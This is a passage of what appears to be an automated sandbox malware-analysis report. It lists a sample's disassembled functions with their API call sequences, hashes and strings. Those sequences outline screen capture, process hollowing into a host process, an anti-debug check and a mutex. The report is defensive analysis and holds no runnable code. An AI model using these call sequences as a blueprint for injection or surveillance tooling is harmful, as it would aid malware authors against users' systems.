                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstH_prologNext
                                                • String ID:
                                                • API String ID: 301083792-0
                                                • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                • String ID:
                                                • API String ID: 2829624132-0
                                                • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                • String ID:
                                                • API String ID: 1815803762-0
                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                • Opcode Fuzzy Hash: abd6fd6b538380b102c55790d6b56a2ac58ff5115e1efa51d285ee8eb71cff1a
                                                • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: <D
                                                • API String ID: 1084509184-3866323178
                                                • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: <D
                                                • API String ID: 1084509184-3866323178
                                                • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: GetLocaleInfoEx
                                                • API String ID: 2299586839-2904428671
                                                • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                • String ID:
                                                • API String ID: 1663032902-0
                                                • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                • String ID:
                                                • API String ID: 2692324296-0
                                                • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                Function 0041A7A2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: NameUser
                                                • String ID:
                                                • API String ID: 2645101109-0
                                                • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID:
                                                • API String ID: 1084509184-0
                                                • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                Function 00433CD7 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                • Instruction Fuzzy Hash:
                                                Function 0044E92E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                  • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                • DeleteDC.GDI32(?), ref: 0041805D
                                                • DeleteDC.GDI32(00000000), ref: 00418060
                                                • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                • GetIconInfo.USER32(?,?), ref: 004180CB
                                                • DeleteObject.GDI32(?), ref: 004180FA
                                                • DeleteObject.GDI32(?), ref: 00418107
                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                • DeleteDC.GDI32(?), ref: 0041827F
                                                • DeleteDC.GDI32(00000000), ref: 00418282
                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                • GlobalFree.KERNEL32(?), ref: 0041834B
                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                • DeleteDC.GDI32(?), ref: 00418398
                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                • String ID: DISPLAY
                                                • API String ID: 1765752176-865373369
                                                • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                • Opcode Fuzzy Hash: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
                                                • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                • GetLastError.KERNEL32 ref: 004175C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                • API String ID: 4188446516-108836778
                                                • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
